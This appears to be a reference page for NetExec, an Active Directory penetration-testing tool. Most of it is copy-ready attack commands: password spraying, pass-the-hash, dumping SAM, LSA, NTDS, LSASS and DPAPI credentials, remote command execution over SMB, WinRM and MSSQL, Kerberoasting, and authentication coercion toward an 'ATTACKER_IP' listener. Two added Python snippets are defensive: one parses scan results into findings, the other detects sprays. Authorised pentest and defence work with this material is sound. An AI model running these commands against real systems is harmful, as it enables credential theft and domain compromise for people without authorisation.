# NetExec (nxc)

NetExec (nxc) — active successor to CrackMapExec: SMB/LDAP/WinRM/MSSQL multi-protocol Swiss army knife for AD pentesting. Password spraying, credential dumping, Kerberoasting, BloodHound collection, LAPS, coercion checks, and 50+ modules. All payloads verified against netexec.wiki.

NetExec (nxc) is the actively maintained successor to CrackMapExec. It sweeps subnets, sprays passwords, dumps credentials, and runs 50+ modules across SMB, LDAP, WinRM, and MSSQL with a single tool.
## Install

```bash
pip3 install netexec
nxc --version

# Update
pip3 install --upgrade netexec
```
## Target Formats

```bash
nxc smb 192.168.1.10
nxc smb 192.168.1.0/24
nxc smb 192.168.1.0-28 10.0.0.1-67
nxc smb ~/targets.txt
```

Output key: `[+]` = login success, `(Pwn3d!)` = local admin / code execution available.
## SMB — Host Discovery & Fingerprint

```bash
# Subnet sweep: hostname, IP, domain, OS, SMB signing status
nxc smb 192.168.1.0/24

# NULL session / anonymous
nxc smb DC_IP -u '' -p ''
nxc smb DC_IP -u '' -p '' --users
nxc smb DC_IP -u '' -p '' --shares
nxc smb DC_IP -u '' -p '' --pass-pol

# Generate relay target list (SMB signing disabled)
nxc smb 192.168.1.0/24 --gen-relay-list relay_list.txt
```
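The sweep and auth lines above produce one console line per host; the parser below (an added example, not part of the page or of NetExec itself) folds them into a per-host record and groups the results into remediation items (signing disabled, SMBv1 on) and access results (`[+]`, `(Pwn3d!)`). The sample output is constructed with fictional hosts, and the column layout and marker spelling are assumptions based on how nxc prints its results.

```python
import re

# Constructed sample of nxc SMB console output (fictional hosts). Column layout
# and the (signing:..)/[+]/(Pwn3d!) markers are assumed; regexes tolerate spacing.
SAMPLE_OUTPUT = """\
SMB  192.168.1.10  445  DC01  [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB  192.168.1.11  445  WS01  [*] Windows 10 Build 19041 x64 (name:WS01) (domain:corp.local) (signing:False) (SMBv1:False)
SMB  192.168.1.12  445  FS01  [*] Windows Server 2016 Build 14393 x64 (name:FS01) (domain:corp.local) (signing:False) (SMBv1:True)
SMB  192.168.1.10  445  DC01  [-] corp.local\\user:Password1 STATUS_LOGON_FAILURE
SMB  192.168.1.11  445  WS01  [+] corp.local\\user:Password1 (Pwn3d!)
SMB  192.168.1.12  445  FS01  [+] corp.local\\user:Password1
"""

# Banner line: IP, port, hostname, then the fingerprint fields in parentheses.
HEADER_RE = re.compile(
    r"^SMB\s+(?P<ip>\S+)\s+\d+\s+(?P<host>\S+)\s+\[\*\].*?\(domain:(?P<domain>[^)]*)\)"
    r"\s+\(signing:(?P<signing>True|False)\)\s+\(SMBv1:(?P<smbv1>True|False)\)"
)
# Auth result line: [+] success / [-] failure, optional (Pwn3d!) = local admin.
AUTH_RE = re.compile(
    r"^SMB\s+(?P<ip>\S+)\s+\d+\s+\S+\s+\[(?P<status>[+-])\]\s+\S+(?P<admin>\s+\(Pwn3d!\))?"
)

def parse_nxc_smb(text):
    """Fold nxc SMB output into one record per IP."""
    hosts = {}
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            h = hosts.setdefault(m["ip"], {"login_ok": False, "admin": False})
            h.update(hostname=m["host"], domain=m["domain"],
                     signing=m["signing"] == "True", smbv1=m["smbv1"] == "True")
            continue
        m = AUTH_RE.match(line)
        if m and m["status"] == "+":
            h = hosts.setdefault(m["ip"], {"login_ok": False, "admin": False})
            h["login_ok"] = True
            h["admin"] = h["admin"] or m["admin"] is not None
    return hosts

def findings(hosts):
    """Group IPs by condition: first two are remediation items, last two access results."""
    pick = lambda cond: sorted(ip for ip, h in hosts.items() if cond(h))
    return {
        "signing_disabled": pick(lambda h: not h.get("signing", True)),
        "smbv1_enabled": pick(lambda h: h.get("smbv1", False)),
        "admin_access": pick(lambda h: h["admin"]),
        "login_only": pick(lambda h: h["login_ok"] and not h["admin"]),
    }
```

Feed it a saved run (`nxc smb ... | tee sweep.log`) and the `signing_disabled` list is the same set that `--gen-relay-list` writes, now alongside which of those hosts also accepted the tested credential.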
## SMB — Authentication & Spraying

```bash
# Domain auth
nxc smb 192.168.1.0/24 -u user -p 'Password1'
nxc smb 192.168.1.0/24 -u user -H NTLM_HASH

# Local auth (against SAM, not domain)
nxc smb 192.168.1.0/24 -u Administrator -p 'Password1' --local-auth
nxc smb 192.168.1.0/24 -u Administrator -H HASH --local-auth

# Kerberos
nxc smb dc.corp.local -u user -p pass -k
export KRB5CCNAME=ticket.ccache && nxc smb dc.corp.local --use-kcache

# Password spray — one password against all users
nxc smb DC_IP -u users.txt -p 'Summer2024' --continue-on-success

# Pair user[n]+pass[n] from file (no cross-product)
nxc smb DC_IP -u users.txt -p passes.txt --no-bruteforce --continue-on-success
```
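A spray like the one above keeps each account well under the lockout threshold, so a per-account failure count never fires; what exposes it is the number of distinct accounts failing from one source inside the lockout observation window. The check below is an added example from the defender's side, not part of the page; the failed-logon records are constructed (field names loosely follow Windows Security event 4625, the hosts, users and times are made up).

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed failed-logon records (fictional sources and accounts).
EVENTS = [
    {"time": "2024-06-03T09:00:01", "src": "10.0.0.50", "user": "alice"},
    {"time": "2024-06-03T09:00:02", "src": "10.0.0.50", "user": "bob"},
    {"time": "2024-06-03T09:00:02", "src": "10.0.0.50", "user": "carol"},
    {"time": "2024-06-03T09:00:03", "src": "10.0.0.50", "user": "dave"},
    {"time": "2024-06-03T09:00:04", "src": "10.0.0.50", "user": "erin"},
    {"time": "2024-06-03T09:00:04", "src": "10.0.0.50", "user": "frank"},
    # One user mistyping their own password: same account, same source.
    {"time": "2024-06-03T09:05:00", "src": "10.0.0.77", "user": "grace"},
    {"time": "2024-06-03T09:05:10", "src": "10.0.0.77", "user": "grace"},
    {"time": "2024-06-03T09:05:20", "src": "10.0.0.77", "user": "grace"},
]

def detect_spray(events, window=timedelta(minutes=10), min_users=5):
    """Per source, slide a window over failures and count distinct accounts.

    Returns {src: (max_distinct_users, max_failures_for_any_one_user)} for
    every source that reached min_users distinct accounts inside one window.
    A spray shows a high first number with a low second one; a single user
    fumbling their password shows the reverse and never alerts.
    """
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append((datetime.fromisoformat(e["time"]), e["user"]))
    alerts = {}
    for src, items in by_src.items():
        items.sort()
        left = 0
        for right in range(len(items)):
            # Advance the window start until it spans at most `window`.
            while items[right][0] - items[left][0] > window:
                left += 1
            users = [u for _, u in items[left:right + 1]]
            distinct = len(set(users))
            if distinct >= min_users:
                per_user = max(users.count(u) for u in set(users))
                prev = alerts.get(src, (0, 0))
                alerts[src] = (max(prev[0], distinct), max(prev[1], per_user))
    return alerts
```

Set `window` to the domain's lockout observation window and `min_users` below the point where the distinct-account count would be unusual for that source (a jump host legitimately sees many accounts; a workstation does not).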
## SMB — Enumeration

```bash
# Shares
nxc smb TARGET -u user -p pass --shares

# Users
nxc smb TARGET -u user -p pass --users

# Local groups
nxc smb TARGET -u user -p pass --local-group

# RID brute (enumerate accounts without a user list)
nxc smb DC_IP -u user -p pass --rid-brute

# Password policy (check lockout threshold before spraying)
nxc smb DC_IP -u user -p pass --pass-pol

# Logged-on users
nxc smb TARGET -u user -p pass --loggedon-users

# Active sessions
nxc smb TARGET -u user -p pass --qwinsta

# Processes
nxc smb TARGET -u user -p pass --tasklist

# AV/EDR detection (no admin needed)
nxc smb TARGET -u user -p pass -M enum_av
```
## SMB — Credential Dumping

```bash
# SAM (local account hashes) — local admin required
nxc smb TARGET -u admin -p pass --sam

# LSA secrets (service accounts, cached hashes) — local admin required
nxc smb TARGET -u admin -p pass --lsa

# NTDS.dit — all domain hashes (DA or DC local admin required)
nxc smb DC_IP -u admin -p pass --ntds
nxc smb DC_IP -u admin -p pass --ntds vss       # via Volume Shadow Copy
nxc smb DC_IP -u admin -p pass --ntds --enabled # enabled accounts only

# LSASS dump via modules
nxc smb TARGET -u admin -p pass -M lsassy
nxc smb TARGET -u admin -p pass -M nanodump
nxc smb TARGET -u admin -p pass -M mimikatz

# DPAPI — Credential Manager + browser creds
nxc smb TARGET -u user -p pass --dpapi
nxc smb TARGET -u user -p pass --dpapi cookies
nxc smb TARGET -u user -p pass --dpapi nosystem # skip SYSTEM creds (stealthier)

# LAPS managed local admin password
nxc smb TARGET -u laps-reader -p pass --laps

# GPP / SYSVOL cpassword
nxc smb DC_IP -u user -p pass -M gpp_password
nxc smb DC_IP -u user -p pass -M gpp_autologin

# Third-party app credentials
nxc smb TARGET -u user -p pass -M veeam
nxc smb TARGET -u user -p pass -M winscp
nxc smb TARGET -u user -p pass -M vnc
```
## SMB — Command Execution

```bash
# Auto-selects best execution method
nxc smb TARGET -u admin -p pass -x whoami

# Force specific method
nxc smb TARGET -u admin -p pass -x whoami --exec-method wmiexec
nxc smb TARGET -u admin -p pass -x whoami --exec-method smbexec
nxc smb TARGET -u admin -p pass -x whoami --exec-method atexec
```
## SMB — Vulnerability Checks

```bash
nxc smb TARGET -u '' -p '' -M zerologon
nxc smb TARGET -u user -p pass -M nopac
nxc smb TARGET -u '' -p '' -M ms17-010
nxc smb TARGET -u '' -p '' -M smbghost
nxc smb TARGET -u '' -p '' -M printnightmare

# Coercion vector check (PrinterBug, PetitPotam, DFSCoerce, etc.)
nxc smb TARGET -u '' -p '' -M coerce_plus
nxc smb TARGET -u '' -p '' -M coerce_plus -o LISTENER=ATTACKER_IP
nxc smb TARGET -u '' -p '' -M coerce_plus -o METHOD=PetitPotam
```
## LDAP Protocol

```bash
# Enumerate
nxc ldap DC_IP -u user -p pass --users
nxc ldap DC_IP -u user -p pass --groups
nxc ldap DC_IP -u user -p pass --computers
nxc ldap DC_IP -u user -p pass --admin-count

# Kerberoasting → hashcat -m 13100
nxc ldap DC_IP -u user -p pass --kerberoasting tgs.txt

# AS-REP Roasting → hashcat -m 18200
nxc ldap DC_IP -u user -p pass --asreproast asrep.txt
nxc ldap DC_IP -u users.txt -p '' --asreproast asrep.txt # no password needed

# LAPS passwords
nxc ldap DC_IP -u user -p pass --laps

# gMSA passwords
nxc ldap DC_IP -u user -p pass --gmsa

# BloodHound collection
nxc ldap DC_IP -u user -p pass --bloodhound --collection All

# Delegation enumeration
nxc ldap DC_IP -u user -p pass --find-delegation
nxc ldap DC_IP -u user -p pass --trusted-for-delegation

# Machine Account Quota (MAQ) — needed for RBCD attack
nxc ldap DC_IP -u user -p pass -M maq

# LDAP signing check
nxc ldap DC_IP -u user -p pass -M ldap-checker

# ADCS discovery
nxc ldap DC_IP -u user -p pass -M adcs

# Password in description field
nxc ldap DC_IP -u user -p pass -M get-desc-users

# Fine-grained password policies
nxc ldap DC_IP -u user -p pass --pso

# Raw LDAP query
nxc ldap DC_IP -u user -p pass --query "(adminCount=1)" "sAMAccountName"
```
## WinRM Protocol

```bash
# Test auth + spray
nxc winrm 192.168.1.0/24 -u user -p pass

# Execute PowerShell command (capital -X)
nxc winrm TARGET -u user -p pass -X whoami
nxc winrm TARGET -u user -p pass -X 'Get-Process | Select -First 5'

# With hash
nxc winrm TARGET -u user -H HASH -X whoami

# Dump from WinRM
nxc winrm TARGET -u user -p pass --sam
nxc winrm TARGET -u user -p pass --lsa
```

`-X` = PowerShell (WinRM). `-x` = cmd.exe (SMB). Capitalization matters.
## MSSQL Protocol

```bash
# Discovery
nxc mssql 192.168.1.0/24

# Windows auth
nxc mssql TARGET -u user -p pass

# SQL local auth
nxc mssql TARGET -u sa -p pass --local-auth

# SQL query
nxc mssql TARGET -u sa -p pass --local-auth -q 'SELECT @@version'

# OS command via xp_cmdshell (auto-enables if off)
nxc mssql TARGET -u sa -p pass --local-auth -x whoami

# Impersonation privilege check
nxc mssql TARGET -u user -p pass -M mssql_priv
nxc mssql TARGET -u user -p pass -M mssql_priv -o ACTION=privesc

# Linked servers
nxc mssql TARGET -u user -p pass -M enum_links
nxc mssql TARGET -u user -p pass -M link_xpcmd -o LINKED_SERVER=SERVER2 CMD='whoami'
```
## Quick Reference

| Flag | Effect |
|---|---|
| `--local-auth` | Authenticate against local SAM |
| `--continue-on-success` | Don't stop after first valid cred |
| `--no-bruteforce` | Pair user[n]+pass[n] only |
| `-k` / `--use-kcache` | Kerberos auth |
| `-x` | Run cmd.exe command (SMB) |
| `-X` | Run PowerShell command (WinRM) |
| `--ntds vss` | Dump NTDS via VSS |
| `--dpapi nosystem` | Skip SYSTEM creds |
| `--laps [name]` | Read LAPS password |
| `--bloodhound --collection All` | Full BloodHound ingest |
| `--gen-relay-list` | Hosts without SMB signing |
| `--asreproast` | AS-REP hashes to file |
| `--kerberoasting` | Kerberoast hashes to file |
| `-M coerce_plus` | Check coercion vectors |